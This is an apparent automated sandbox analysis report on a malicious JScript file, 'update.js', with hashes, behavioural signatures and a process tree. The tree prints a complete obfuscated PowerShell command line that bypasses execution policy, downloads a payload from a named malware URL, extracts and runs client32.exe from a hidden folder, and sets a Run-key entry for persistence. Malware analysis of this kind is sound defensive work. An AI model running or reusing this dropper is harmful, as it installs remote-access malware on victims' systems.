Analysis
max time kernel: 122s
max time network: 123s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 18-04-2024 15:31
Static task: static1
Behavioral task: behavioral1
  Sample: update.js
  Resource: win7-20240221-en (windows7-x64)
  5 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: update.js
  Resource: win10v2004-20240412-en (windows10-2004-x64)
  11 signatures, 150 seconds
General
Target: update.js
Size: 14.0MB
MD5: f5939cb008c6b2f0b14ada53776fe570
SHA1: 1f536bd1399548d04aa0b4b6a74d5a8c12e3c643
SHA256: a6125ebaa40f9c6eb9fe9b753c9f066e43713cab31c464d1601f7a2abdbe7c02
SHA512: a5ccbc4ef7cd0f5a5ce34852fc4596573d1445a5563facb767d155371203916fd29d5ba2ab56507fed52e0c6979083a905f5cd9f8f579b5e709d7ae2f428ed61
SSDEEP: 49152:87V7zjCxbzqHlp4LhyN0kghDzLZzjYzYsmCW+8z2V35//9SGGqHm3quVIKXgxcER:m
Score: 10/10
Malware Config
Extracted
Language: ps1
Source URLs:
  ps1.dropper: https://beautyservicenearme.com/data.php?8838
  exe.dropper: https://beautyservicenearme.com/data.php?8838
Signatures

Blocklisted process makes network request (2 IoCs)
flow  pid   Process
5     2096  powershell.exe
6     2096  powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (1 IoCs)
pid   Process
2096  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
description              pid   Process
Token: SeDebugPrivilege  2096  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
description                       pid   Process      procid_target
PID 1736 wrote to memory of 2096  1736  wscript.exe  28
PID 1736 wrote to memory of 2096  1736  wscript.exe  28
PID 1736 wrote to memory of 2096  1736  wscript.exe  28
Processes

1. C:\Windows\system32\wscript.exe (PID: 1736)
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\update.js
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 2096, child of PID 1736)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UcZctLCmEtbcnvSYsTGhPQubtWwaaIDl='https://beautyservicenearme.com/data.php?8838';$MoIFydvsffaOFrkbuhxurBLYbzH=(New-Object System.Net.WebClient).DownloadString($UcZctLCmEtbcnvSYsTGhPQubtWwaaIDl);$IgFsyQktTRAIEbAiPQTXmgSkFbxoHRq=[System.Convert]::FromBase64String($MoIFydvsffaOFrkbuhxurBLYbzH);$zxc = Get-Random -Minimum -5 -Maximum 17; $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -PathType Container)) { New-Item -Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -ItemType Directory };$p=Join-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF 'BB.zip';[System.IO.File]::WriteAllBytes($p,$IgFsyQktTRAIEbAiPQTXmgSkFbxoHRq);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF -Force; $AZ.attributes='Hidden';$s=$EQuYTKytTtzKuvtratyAyFMsdsDyVqnpPKF+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICE_C';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken